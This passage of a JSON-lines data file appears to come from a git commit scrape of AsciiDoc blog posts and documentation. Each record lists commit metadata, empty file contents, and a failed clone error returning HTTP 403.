2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a52cedeeb10cbfc1f26bc620e1b738ded1204f5","subject":"y2b create post This Gadget Claims To Make You A Better Gamer...","message":"y2b create post This Gadget Claims To Make You A Better Gamer...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-12-This-Gadget-Claims-To-Make-You-A-Better-Gamer.adoc","new_file":"_posts\/2016-11-12-This-Gadget-Claims-To-Make-You-A-Better-Gamer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b413cc8fd4abf09897d62afe98f61c793e48d6","subject":"add intro to architecture","message":"add intro to 
architecture\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Architectue.adoc","new_file":"docs\/Architectue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"41b3b5bfb965b241cd331186d679c4be6a7fcfe1","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0996ba6eb478276948a1d2232fdc6f085da3641d","subject":"Changed headlines, h1 was broken on the rendered site","message":"Changed headlines, h1 was broken on the rendered site\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"docs\/opcodes.asciidoc","new_file":"docs\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20f9d83fc761c3838cc36b0e2782b44bb704ad63","subject":"Update 2016-10-18-Heroku-MongoDB.adoc","message":"Update 2016-10-18-Heroku-MongoDB.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-10-18-Heroku-MongoDB.adoc","new_file":"_posts\/2016-10-18-Heroku-MongoDB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ece309eeac5b96bfa1421ca9e5b78cb8fd387c","subject":"Update 2018-12-14-Metabase-K-P-I.adoc","message":"Update 2018-12-14-Metabase-K-P-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676e2caafde4d05eab6bae293cf66831adb416ae","subject":"y2b create post Limited Edition Xbox 360 Kinect Star Wars Bundle Unboxing","message":"y2b create post Limited Edition Xbox 360 Kinect Star Wars Bundle Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-04-Limited-Edition-Xbox-360-Kinect-Star-Wars-Bundle-Unboxing.adoc","new_file":"_posts\/2012-04-04-Limited-Edition-Xbox-360-Kinect-Star-Wars-Bundle-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92cddd8c320e9a20b9388bc338cd029ce89b6aec","subject":"URLs redirect","message":"URLs redirect\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc171458b89817b4c5e749fbcf284320bad99171","subject":"Added libcryptohost description","message":"Added libcryptohost description\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/libcryptohost.adoc","new_file":"doc\/manpage\/libcryptohost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e54c61ec623e08ca60d744e7ad88930cefcdf13f","subject":"add information where to find the mongodb jar files, fixes #265","message":"add information where to find the mongodb jar files, fixes #265\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"748eb61c9f165acfde3fcffd5a2dbf83211fe810","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0786f36fe728e21cdf07e6c0411265e1b5b981f6","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9be64243708450ed9d9d40b08aaf418f00c414d","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96b48f38db87626e4337568ef83471bf96ff4d9f","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c73d157c7d83a7ec7eadab37e70a54efab7d64","subject":"rest: Start to document the rest interface of the system","message":"rest: Start to document the rest interface of the system\n\nThese routines should work but are not tested yet. There is an open\nactivity for creating a test for these.\n","repos":"zecke\/osmo-smsc,woglinde\/osmo-smsc,zecke\/osmo-smsc,woglinde\/osmo-smsc,zecke\/osmo-smsc,woglinde\/osmo-smsc","old_file":"docs\/rest.asciidoc","new_file":"docs\/rest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woglinde\/osmo-smsc.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0b563c80e5b5c5c0b88947f2f8aaf26a357c8aef","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9daea05b5ca5ad2c8e0232ce5cd3147729b91935","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706fcf3b1c5bf3e6a113d34a7ccf79faf1cddd6d","subject":"Update 2015-03-30-Echography-simulator.adoc","message":"Update 2015-03-30-Echography-simulator.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-30-Echography-simulator.adoc","new_file":"_posts\/2015-03-30-Echography-simulator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d76e1db3eb3a1cf7bd7691fb3d3da8f9d99895","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 
2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc6a26ecaad1490006ce028062d984e3bb84ed0","subject":"Update 2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","message":"Update 2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","new_file":"_posts\/2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7d4a68df70f205a6eb3f40e99e8144df253c51c","subject":"Update 2015-02-10-First-post.adoc","message":"Update 2015-02-10-First-post.adoc","repos":"Red5\/red5.github.io,Red5\/red5.github.io","old_file":"_posts\/2015-02-10-First-post.adoc","new_file":"_posts\/2015-02-10-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Red5\/red5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87a09a82ce422a6cb2243f8ab9eab18c16f5283b","subject":"Update 2018-03-13-P-H-Per-Golang.adoc","message":"Update 2018-03-13-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-13-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-13-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0b7c33c3dd0765e30e193950511b24c75ef654","subject":"some (preliminary) documentation on #219","message":"some (preliminary) documentation on #219\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/development\/issue-219.adoc","new_file":"src\/docs\/development\/issue-219.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1376b2f6e37f4ea302d65654d7320e1c1d815ae3","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"521241305bb54c55a54be72ffb220cafc84e67b7","subject":"1.7 CR announcement","message":"1.7 CR announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-09-16-debezium-1-7-cr1-released.adoc","new_file":"_posts\/2021-09-16-debezium-1-7-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a57a49b9757c38d83c8504754a2c1b2304b54735","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a67a8623e356146dd8d03be866c73475534c8d4","subject":"Update 2016-12-18-Daring-to-Live.adoc","message":"Update 2016-12-18-Daring-to-Live.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-Daring-to-Live.adoc","new_file":"_posts\/2016-12-18-Daring-to-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d3d4bf3cec5337bfb14f202eeb83ea00c4249c","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b9bc938e0f11475b1d41bcf0d76d432c7f2e751","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ccd5bc792e9901ead01a755ac94c3c6e1a34763","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 
2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81ed553c8f002c55a24a15ec58c9b04f03e4b944","subject":"Update 2016-08-24-reducing-game-servers-latency.adoc","message":"Update 2016-08-24-reducing-game-servers-latency.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-24-reducing-game-servers-latency.adoc","new_file":"_posts\/2016-08-24-reducing-game-servers-latency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"161af9f0cbeeafb79a8cdeec6720a1ed9ca756a9","subject":"Update 2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","message":"Update 2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","new_file":"_posts\/2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67464194e26240e452eb74d77e19639b60337c33","subject":"Update 2017-05-28-what-you-can-see-web-analytic.adoc","message":"Update 2017-05-28-what-you-can-see-web-analytic.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-what-you-can-see-web-analytic.adoc","new_file":"_posts\/2017-05-28-what-you-can-see-web-analytic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa50a954c2e78855205d9435d89d5fa77a3f34ec","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ec4dba597d61e53cb5dccbd6c4e1b41f40f3075","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 
2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a196d9b5bb3b4c86e4653186388c0c6686d533e","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73568724ab167a00b488df19d6128cb61bcc8a02","subject":"intention\/layout\/design","message":"intention\/layout\/design\n","repos":"jzacsh\/study,jzacsh\/study,jzacsh\/study","old_file":"static\/README.adoc","new_file":"static\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/study.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"fccaf6170f7ef8a4b2a8091bd5d58287864b7f3a","subject":"Updated README","message":"Updated README\n","repos":"aucampia\/dnspod-int-py","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aucampia\/dnspod-int-py.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32bee7f3301b6a9ab05c60862c94dc34a0e9b698","subject":"Update 2016-04-12-First-Blog-Post.adoc","message":"Update 2016-04-12-First-Blog-Post.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-First-Blog-Post.adoc","new_file":"_posts\/2016-04-12-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e62dd0bb78395dc0c6a8736c9ef36bc6adc2798f","subject":"Update 2015-07-20-Linux-Shell-PATH-variation.adoc","message":"Update 2015-07-20-Linux-Shell-PATH-variation.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-07-20-Linux-Shell-PATH-variation.adoc","new_file":"_posts\/2015-07-20-Linux-Shell-PATH-variation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a5e26236ef3e394dfe740ac1dd0e12b0123e20","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 
2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5738806d58a411f9a628208176a17a2da68d06dd","subject":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","message":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-16-WhichSmartphoneDoTheyACTUALLYUseMKBHDAustinEvansLinusMore.adoc","new_file":"_posts\/2018-01-16-WhichSmartphoneDoTheyACTUALLYUseMKBHDAustinEvansLinusMore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced6faa0825253a4b87118f90f680e819cf9c194","subject":"License info added","message":"License info added\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f5d8401fe3fb0d04107709200d39e76cf2b45e2","subject":"Update 2015-05-31-Erster-Eintrag.adoc","message":"Update 2015-05-31-Erster-Eintrag.adoc","repos":"matthiaselzinga\/matthiaselzinga.github.io,matthiaselzinga\/matthiaselzinga.github.io,matthiaselzinga\/matthiaselzinga.github.io","old_file":"_posts\/2015-05-31-Erster-Eintrag.adoc","new_file":"_posts\/2015-05-31-Erster-Eintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthiaselzinga\/matthiaselzinga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea176b5c206591df1c7021a1ed90c75e85aa0b61","subject":"Update 2016-08-02-git-clone-CRLF.adoc","message":"Update 2016-08-02-git-clone-CRLF.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-02-git-clone-CRLF.adoc","new_file":"_posts\/2016-08-02-git-clone-CRLF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"441c6e1ae0b29b76a01f2547c1db5456a9468888","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
